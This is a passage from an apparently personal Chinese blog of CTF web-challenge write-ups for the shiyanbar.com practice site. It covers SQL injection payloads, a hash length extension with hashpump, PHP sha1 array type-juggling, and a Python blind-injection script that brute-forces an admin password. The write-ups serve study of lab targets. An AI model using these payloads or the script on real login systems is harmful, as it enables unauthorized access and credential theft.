<p>get参数password，与session的参数比较，相等就输出flag。</p>
<p>这题思路猥琐。。。随机数都是骗人的，让两者都为空就行了。</p>
<p>burpsuite抓包，将phpsessid置空，并get参数password为空就行。。</p>
<p>payload:<code>?password=  cookie:phpsessid=</code></p>
<p>flag:<code>CTF{Cl3ar_th3_S3ss1on}</code></p>
<h3 id="程序逻辑问题"><a href="#程序逻辑问题" class="headerlink" title="程序逻辑问题"></a>程序逻辑问题</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/62" target="_blank" rel="external">http://www.shiyanbar.com/ctf/62</a></p>
<p>查看网页源代码，提示index.txt文件，访问看到源代码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"></div><div class="line"></div><div class="line"><span class="keyword">if</span>($_POST[user] &amp;&amp; $_POST[pass]) &#123;</div><div class="line">  $conn = mysql_connect(<span class="string">"********"</span>, <span class="string">"*****"</span>, <span class="string">"********"</span>);</div><div class="line">  mysql_select_db(<span class="string">"phpformysql"</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"Could not select database"</span>);</div><div class="line">  <span class="keyword">if</span> ($conn-&gt;connect_error) &#123;</div><div class="line">    <span class="keyword">die</span>(<span class="string">"Connection failed: "</span> . mysql_error($conn));</div><div class="line">  &#125; </div><div class="line">$user = $_POST[user];</div><div class="line">$pass = md5($_POST[pass]);</div><div class="line"></div><div class="line">$sql = <span class="string">"select pw from php where user='$user'"</span>;</div><div class="line">$query = mysql_query($sql);</div><div class="line"><span class="keyword">if</span> (!$query) &#123;</div><div class="line">  printf(<span class="string">"Error: %s\n"</span>, mysql_error($conn));</div><div class="line">  <span class="keyword">exit</span>();</div><div class="line">&#125;</div><div class="line">$row = mysql_fetch_array($query, MYSQL_ASSOC);</div><div class="line"><span class="comment">//echo $row["pw"];</span></div><div class="line">  </div><div class="line">  <span class="keyword">if</span> (($row[pw]) &amp;&amp; (!strcasecmp($pass, $row[pw]))) &#123;</div><div class="line">  <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Logged in! Key:************** &lt;/p&gt;"</span>;</div><div class="line">&#125;</div><div class="line"><span class="keyword">else</span> &#123;</div><div class="line">    <span class="keyword">echo</span>(<span class="string">"&lt;p&gt;Log in failure!&lt;/p&gt;"</span>);</div><div class="line">  </div><div class="line">  &#125;</div><div class="line">&#125;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>post参数username passowrd，查询username对应的password，并将输入的password值的md5值与数据库中的password值比较，一样就输出key。</p>
<p>我们输入的password值是可控的，$sql也需要是可控的。</p>
<p>查询语句是<code>select pw from php where user=&#39;$user&#39;</code>，我们可以通过闭合等构造sql语句来让$sql变量可控。</p>
<p>让<code>username=username&#39; union select md5(1)#</code>，查询语句就变成了<code>select pw from php where user=&#39;username&#39; union select md5(1)#&#39;</code>，就达到了目的，让<code>row[pw]</code>变成了1的md5值，再让password=1就可以得到flag。</p>
<p>flag：<code>SimCTF{youhaocongming}</code></p>
<h3 id="登陆一下好吗"><a href="#登陆一下好吗" class="headerlink" title="登陆一下好吗??"></a>登陆一下好吗??</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1942" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1942</a></p>
<p>思路清奇，手工测试了一下，过滤了<code>or , union , # , select ,* ,/</code>，好像是都被过滤了。没办法看了看writeup。</p>
<p>payload是<code>username=1&#39;=&#39;0&amp;password=1&#39;=&#39;0</code></p>
<p>猜测sql查询语句是这样的。<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$sql = <span class="string">"select user from flag where user='$_POST['user']' and password='$_POST['password']'"</span>;</div></pre></td></tr></table></figure></p>
<p>如果按照上面的参数就变成了。<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$sql = <span class="string">"select user from flag where user='1'='0' and password='=1'='0'"</span>;</div></pre></td></tr></table></figure></p>
<p>user=1返回的是0=0,符合条件的，最后就是<br><figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">$sql = “select user from flag where <span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span>”;</div></pre></td></tr></table></figure></p>
<p>就可以登陆进去了。</p>
<p>flag：<code>ctf{51d1bf8fb65a8c2406513ee8f52283e7}</code></p>
<h3 id="让我进去"><a href="#让我进去" class="headerlink" title="让我进去"></a>让我进去</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1848" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1848</a></p>
<p>先用burpsuite抓包，发现setcookie中有source=0，在cookie中赋值，将其改为1，得到源代码。</p>
<p><img src="https://github.com/Windylh/image/raw/master/2017.7.25/hash1.png" alt="hash1"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div></pre></td><td class="code"><pre><div class="line">$flag = <span class="string">"XXXXXXXXXXXXXXXXXXXXXXX"</span>;</div><div class="line">$secret = <span class="string">"XXXXXXXXXXXXXXX"</span>; <span class="comment">// This secret is 15 characters long for security!</span></div><div class="line"></div><div class="line">$username = $_POST[<span class="string">"username"</span>];</div><div class="line">$password = $_POST[<span class="string">"password"</span>];</div><div class="line"></div><div class="line"><span class="keyword">if</span> (!<span class="keyword">empty</span>($_COOKIE[<span class="string">"getmein"</span>])) &#123;</div><div class="line">    <span class="keyword">if</span> (urldecode($username) === <span class="string">"admin"</span> &amp;&amp; urldecode($password) != <span class="string">"admin"</span>) &#123;</div><div class="line">        <span class="keyword">if</span> ($COOKIE[<span class="string">"getmein"</span>] === md5($secret . urldecode($username . $password))) &#123;</div><div class="line">            <span class="keyword">echo</span> <span class="string">"Congratulations! You are a registered user.\n"</span>;</div><div class="line">            <span class="keyword">die</span> (<span class="string">"The flag is "</span>. $flag);</div><div class="line">        &#125;</div><div class="line">        <span class="keyword">else</span> &#123;</div><div class="line">            <span class="keyword">die</span> (<span class="string">"Your cookies don't match up! STOP HACKING THIS SITE."</span>);</div><div class="line">        &#125;</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">else</span> &#123;</div><div class="line">        <span class="keyword">die</span> (<span class="string">"You are not an admin! LEAVE."</span>);</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line">setcookie(<span class="string">"sample-hash"</span>, md5($secret . urldecode(<span class="string">"admin"</span> . <span class="string">"admin"</span>)), time() + (<span class="number">60</span> * <span class="number">60</span> * <span class="number">24</span> * <span class="number">7</span>));</div><div class="line"></div><div class="line"><span class="keyword">if</span> (<span class="keyword">empty</span>($_COOKIE[<span class="string">"source"</span>])) &#123;</div><div class="line">    setcookie(<span class="string">"source"</span>, <span class="number">0</span>, time() + (<span class="number">60</span> * <span class="number">60</span> * <span class="number">24</span> * <span class="number">7</span>));</div><div class="line">&#125;</div><div class="line"><span class="keyword">else</span> &#123;</div><div class="line">    <span class="keyword">if</span> ($_COOKIE[<span class="string">"source"</span>] != <span class="number">0</span>) &#123;</div><div class="line">        <span class="keyword">echo</span> <span class="string">""</span>; <span class="comment">// This source code is outputted here</span></div><div class="line">    &#125;</div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>samlpe-hash是15位的secret+adminadmin的md5值，要获得flag，要让cookie中的getmein值等于secret+username+password的md5值，password又不能等于admin，所以要利用哈希扩展攻击，这里直接用的hashpump工具。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">hashpump -s 571580b26c65f306376d4f64e53cb5c7 -d admin -k 20 -a admin</div></pre></td></tr></table></figure></p>
<p>输出结果<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">e18dfd8404515016d3aeeea2aa196909</div><div class="line">admin\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\x00\x00\x00\x00\x00\x00\x00admin</div></pre></td></tr></table></figure></p>
<p>将<code>\x</code>换成<code>%</code>并填入对应位置。<br><img src="https://github.com/Windylh/image/raw/master/2017.7.25/hash2.png" alt="hash2"></p>
<p>flag：<code>CTF{cOOkieS_4nd_hAshIng_G0_w3LL_t0g3ther}</code></p>
<h3 id="因缺思汀的绕过"><a href="#因缺思汀的绕过" class="headerlink" title="因缺思汀的绕过"></a>因缺思汀的绕过</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1940" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1940</a></p>
<p>查看源代码，在注释中提示我们看source.txt，获得源码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line">error_reporting(<span class="number">0</span>);</div><div class="line"></div><div class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>($_POST[<span class="string">'uname'</span>]) || !<span class="keyword">isset</span>($_POST[<span class="string">'pwd'</span>])) &#123;</div><div class="line">  <span class="keyword">echo</span> <span class="string">'&lt;form action="" method="post"&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">  <span class="keyword">echo</span> <span class="string">'&lt;input name="uname" type="text"/&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">  <span class="keyword">echo</span> <span class="string">'&lt;input name="pwd" type="text"/&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">  <span class="keyword">echo</span> <span class="string">'&lt;input type="submit" /&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">  <span class="keyword">echo</span> <span class="string">'&lt;/form&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">  <span class="keyword">echo</span> <span class="string">'&lt;!--source: source.txt--&gt;'</span>.<span class="string">"&lt;br/&gt;"</span>;</div><div class="line">    <span class="keyword">die</span>;</div><div class="line">&#125;</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">function</span> <span class="title">AttackFilter</span><span class="params">($StrKey,$StrValue,$ArrReq)</span></span>&#123;  </div><div class="line">    <span class="keyword">if</span> (is_array($StrValue))&#123;</div><div class="line">        $StrValue=implode($StrValue);</div><div class="line">    &#125;</div><div class="line">    <span class="keyword">if</span> (preg_match(<span class="string">"/"</span>.$ArrReq.<span class="string">"/is"</span>,$StrValue)==<span class="number">1</span>)&#123;   </div><div class="line">        <span class="keyword">print</span> <span class="string">"水可载舟，亦可赛艇！"</span>;</div><div class="line">        <span class="keyword">exit</span>();</div><div class="line">    &#125;</div><div class="line">&#125;</div><div class="line"></div><div class="line">$filter = <span class="string">"and|select|from|where|union|join|sleep|benchmark|,|\(|\)"</span>;</div><div class="line"><span class="keyword">foreach</span>($_POST <span class="keyword">as</span> $key=&gt;$value)&#123; </div><div class="line">    AttackFilter($key,$value,$filter);</div><div class="line">&#125;</div><div class="line"></div><div class="line">$con = mysql_connect(<span class="string">"XXXXXX"</span>,<span class="string">"XXXXXX"</span>,<span class="string">"XXXXXX"</span>);</div><div class="line"><span class="keyword">if</span> (!$con)&#123;</div><div class="line">  <span class="keyword">die</span>(<span class="string">'Could not connect: '</span> . mysql_error());</div><div class="line">&#125;</div><div class="line">$db=<span class="string">"XXXXXX"</span>;</div><div class="line">mysql_select_db($db, $con);</div><div class="line">$sql=<span class="string">"SELECT * FROM interest WHERE uname = '&#123;$_POST['uname']&#125;'"</span>;</div><div class="line">$query = mysql_query($sql); </div><div class="line"><span class="keyword">if</span> (mysql_num_rows($query) == <span class="number">1</span>) &#123; </div><div class="line">    $key = mysql_fetch_array($query);</div><div class="line">    <span class="keyword">if</span>($key[<span class="string">'pwd'</span>] == $_POST[<span class="string">'pwd'</span>]) &#123;</div><div class="line">        <span class="keyword">print</span> <span class="string">"CTF&#123;XXXXXX&#125;"</span>;</div><div class="line">    &#125;<span class="keyword">else</span>&#123;</div><div class="line">        <span class="keyword">print</span> <span class="string">"亦可赛艇！"</span>;</div><div class="line">    &#125;</div><div class="line">&#125;<span class="keyword">else</span>&#123;</div><div class="line">  <span class="keyword">print</span> <span class="string">"一颗赛艇！"</span>;</div><div class="line">&#125;</div><div class="line">mysql_close($con);</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p><strong>$filter = “and|select|from|where|union|join|sleep|benchmark|,|(|)“;</strong></p>
<p>经过AttackFilter()函数过滤了这些关键字，所以还有关键字的就不用想了。</p>
<p>要输出flag就要满足<code>mysql_num_rows($query) == 1</code>、<code>$key[&#39;pwd&#39;] == $_POST[&#39;pwd&#39;]</code>这两个条件。</p>
<p>没啥思路，看了看dalao的<a href="http://blog.csdn.net/qq_35078631/article/details/54772798" target="_blank" rel="external">writeup</a>。</p>
<p><code>mysql_num_rows()函数返回结果集中行的数目。</code>我们构造uname让sql语句查询出来的结果是一行就能绕过。<code>Uname = &#39;or 1 limit 1#</code>，这样sql语句就是<code>SELECT * FROM interest WHERE uname = &#39;&#39;or 1 limit 1#</code>，这样就查询1行，也就能绕过第一个条件。</p>
<p>第二个条件是让查询的pwd的值等于输入的值，此处用的是 ==，根据弱类型，NULL和空字符串是相等的，然后就是绕过pwd了，其实就是一个关键字 with rollup 他经常和group by搭配，用来统计。使用了with rollup数据会多一列，显示统计信息，对应的pwd参数是NULL。用<code>OFFSET</code>参数来跳过前面的数据。最后构造的参数就是<code>uname=&#39;or 1 group by pwd with rollup limit 1 OFFSET xx#</code>，xx是猜测的数字。</p>
<p>payload:<code>uname=&#39;or 1 group by pwd with rollup limit 1 OFFSET 2#</code></p>
<p>flag：<code>CTF{with_rollup_interesting}</code></p>
<h3 id="FALSE"><a href="#FALSE" class="headerlink" title="FALSE"></a>FALSE</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1787" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1787</a></p>
<p>题目给出了登录框，点击view source查看源代码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line"><span class="meta">&lt;?php</span></div><div class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'name'</span>]) <span class="keyword">and</span> <span class="keyword">isset</span>($_GET[<span class="string">'password'</span>])) &#123;</div><div class="line">    <span class="keyword">if</span> ($_GET[<span class="string">'name'</span>] == $_GET[<span class="string">'password'</span>])</div><div class="line">        <span class="keyword">echo</span> <span class="string">'&lt;p&gt;Your password can not be your name!&lt;/p&gt;'</span>;</div><div class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (sha1($_GET[<span class="string">'name'</span>]) === sha1($_GET[<span class="string">'password'</span>]))</div><div class="line">      <span class="keyword">die</span>(<span class="string">'Flag: '</span>.$flag);</div><div class="line">    <span class="keyword">else</span></div><div class="line">        <span class="keyword">echo</span> <span class="string">'&lt;p&gt;Invalid password.&lt;/p&gt;'</span>;</div><div class="line">&#125;</div><div class="line"><span class="keyword">else</span>&#123;</div><div class="line">  <span class="keyword">echo</span> <span class="string">'&lt;p&gt;Login first!&lt;/p&gt;'</span>;</div><div class="line"><span class="meta">?&gt;</span></div></pre></td></tr></table></figure>
<p>get获得参数name和passowrd，要获得flag，就要让两个参数不相等，但是两个参数的sha1()相等。</p>
<p>这里可以运用数组绕过，<strong>sha1的参数必须为字符串，如果为其他的类型，则会直接返回FLASE</strong>，让两个参数都为数组的形式，就可以<code>FALSE===FALSE</code>，输出flag。</p>
<p>payload:<code>?name[]=1&amp;password[]=2</code></p>
<p>flag:<code>CTF{t3st_th3_Sha1}</code></p>
<h3 id="Forms"><a href="#Forms" class="headerlink" title="Forms"></a>Forms</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/1819" target="_blank" rel="external">http://www.shiyanbar.com/ctf/1819</a></p>
<p>查看网页源代码。<br><figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"hidden"</span> <span class="attr">name</span>=<span class="string">"showsource"</span> <span class="attr">value</span>=<span class="string">0</span>&gt;</span></div></pre></td></tr></table></figure></p>
<p>将type中的hidden去掉，并赋值value=1，提交，就能看到源代码了。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">$a = $_POST[<span class="string">"PIN"</span>];</div><div class="line"><span class="keyword">if</span> ($a == <span class="number">-19827747736161128312837161661727773716166727272616149001823847</span>) &#123;</div><div class="line">    <span class="keyword">echo</span> <span class="string">"Congratulations! The flag is $flag"</span>;</div><div class="line">&#125; <span class="keyword">else</span> &#123;</div><div class="line">    <span class="keyword">echo</span> <span class="string">"User with provided PIN not found."</span>; </div><div class="line">&#125;</div></pre></td></tr></table></figure>
<p>让a等于对应的数字，就能得到flag。</p>
<p>flag：<code>ctf{forms_are_easy}</code></p>
<h3 id="看起来有点难"><a href="#看起来有点难" class="headerlink" title="看起来有点难"></a>看起来有点难</h3><p>题目：<a href="http://www.shiyanbar.com/ctf/2" target="_blank" rel="external">http://www.shiyanbar.com/ctf/2</a></p>
<p>题目是一个登陆页面，有回显，用admin，admin测试，发现提示<code>登录失败，错误的用户名和密码</code>，当用户名改为其他时，提示<code>数据库连接失败！</code>，猜测是bool型注入。</p>
<p>先查询passowrd的位数，<code>?admin=admin&#39; AND length(password)=8 -- &amp;pass=admin&amp;action=login</code>，password有8位，就可以用python脚本爆破了！</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#-*-coding:utf-8-*-</span></div><div class="line"></div><div class="line"><span class="keyword">import</span> requests </div><div class="line"><span class="keyword">import</span> time</div><div class="line"></div><div class="line">url = <span class="string">'http://ctf5.shiyanbar.com/basic/inject/index.php?admin='</span> </div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">check</span><span class="params">(payload)</span>:</span></div><div class="line">  url1=url+payload </div><div class="line">  a=<span class="string">'登陆失败'</span></div><div class="line">  <span class="comment">#print url1  </span></div><div class="line">  r = requests.get(url1).content</div><div class="line">  <span class="comment">#print r</span></div><div class="line">  <span class="keyword">return</span> len(r)==<span class="number">775</span></div><div class="line"></div><div class="line">flag=<span class="string">''</span></div><div class="line">s = <span class="string">r'1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@_&#123;&#125;'</span></div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">1</span>,<span class="number">9</span>):    </div><div class="line">  <span class="keyword">for</span> c <span class="keyword">in</span> s:        </div><div class="line">    payload = <span class="string">'admin\' AND substr((password),'</span>+str(i)+<span class="string">',1)=\''</span>+c+<span class="string">'\' -- &amp;pass=admin&amp;action=login'</span>     </div><div class="line">    <span class="comment">#print payload</span></div><div class="line">    <span class="keyword">if</span> check(payload):</div><div class="line">      flag += c</div><div class="line">      <span class="keyword">break</span></div><div class="line">  <span class="keyword">print</span> flag</div></pre></td></tr></table></figure>
<p>在编码方面卡了一阵，最后用len()求长度解决了。</p>
<p>用admin和爆破出来的密码登陆就是flag。</p>
<p>flag：<code>!@#WwwN5f0cu5coM</code></p>

      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/WriteUp/" rel="tag"># WriteUp</a>
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/07/11/火种CTF Writeup/" rel="next" title="火种CTF Writeup">
                <i class="fa fa-chevron-left"></i> 火种CTF Writeup
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/09/18/实验吧(密码学、杂项、隐写部分)Writeup/" rel="prev" title="实验吧(密码学、杂项、隐写部分)Writeup">
                实验吧(密码学、杂项、隐写部分)Writeup <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Inhaltsverzeichnis
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Übersicht
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="https://raw.githubusercontent.com/Windylh/image/master/logo.jpg"
                alt="Windylh"/>
            
              <p class="site-author-name" itemprop="name">Windylh</p>
              <div class="site-description motion-element" itemprop="description"></div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">31</span>
                    <span class="site-state-item-name">Artikel</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                      <a href="/tags/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">13</span>
                    <span class="site-state-item-name">schlagwörter</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/Windylh" title="GitHub &rarr; https://github.com/Windylh" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="mailto:windylhpeng@gmail.com" title="E-Mail &rarr; mailto:windylhpeng@gmail.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://twitter.com/WindylhPeng" title="Twitter &rarr; https://twitter.com/WindylhPeng" rel="noopener" target="_blank"><i class="fa fa-fw fa-twitter"></i>Twitter</a>
                </span>
              
            </div>
          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://blog.izilong.net/" title="http://blog.izilong.net/" rel="noopener" target="_blank">Zilong's blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://p0sec.net/" title="https://p0sec.net/" rel="noopener" target="_blank">p0's blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://p0desta.com/" title="http://p0desta.com/" rel="noopener" target="_blank">p0desta's blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://mengsec.com/" title="https://mengsec.com/" rel="noopener" target="_blank">Mengchen's blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://keysking.github.io/" title="https://keysking.github.io/" rel="noopener" target="_blank">Keysking's blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://lanvnal.com/" title="http://lanvnal.com/" rel="noopener" target="_blank">LANVNAL's blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://0sec.com.cn/" title="http://0sec.com.cn/" rel="noopener" target="_blank">Fazx‘s blog</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#PHP大法"><span class="nav-number">1.</span> <span class="nav-text">PHP大法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#NSCTF-web200"><span class="nav-number">2.</span> <span class="nav-text">NSCTF web200</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#忘记密码了"><span class="nav-number">3.</span> <span class="nav-text">忘记密码了</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#这个看起来有点简单"><span class="nav-number">4.</span> <span class="nav-text">这个看起来有点简单!</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#上传绕过"><span class="nav-number">5.</span> <span class="nav-text">上传绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#天网管理系统"><span class="nav-number">6.</span> <span class="nav-text">天网管理系统</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Once-More"><span class="nav-number">7.</span> <span class="nav-text">Once More</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#简单的sql注入"><span class="nav-number">8.</span> <span class="nav-text">简单的sql注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#天下武功唯快不破"><span class="nav-number">9.</span> <span class="nav-text">天下武功唯快不破</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Forbidden"><span class="nav-number">10.</span> <span class="nav-text">Forbidden</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#简单的sql注入之2"><span class="nav-number">11.</span> <span class="nav-text">简单的sql注入之2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#简单的sql注入之3"><span class="nav-number">12.</span> <span class="nav-text">简单的sql注入之3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Guess-Next-Session"><span class="nav-number">13.</span> <span class="nav-text">Guess Next Session</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#程序逻辑问题"><span class="nav-number">14.</span> <span class="nav-text">程序逻辑问题</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#登陆一下好吗"><span class="nav-number">15.</span> <span class="nav-text">登陆一下好吗??</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#让我进去"><span class="nav-number">16.</span> <span class="nav-text">让我进去</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#因缺思汀的绕过"><span class="nav-number">17.</span> <span class="nav-text">因缺思汀的绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#FALSE"><span class="nav-number">18.</span> <span class="nav-text">FALSE</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Forms"><span class="nav-number">19.</span> <span class="nav-text">Forms</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#看起来有点难"><span class="nav-number">20.</span> <span 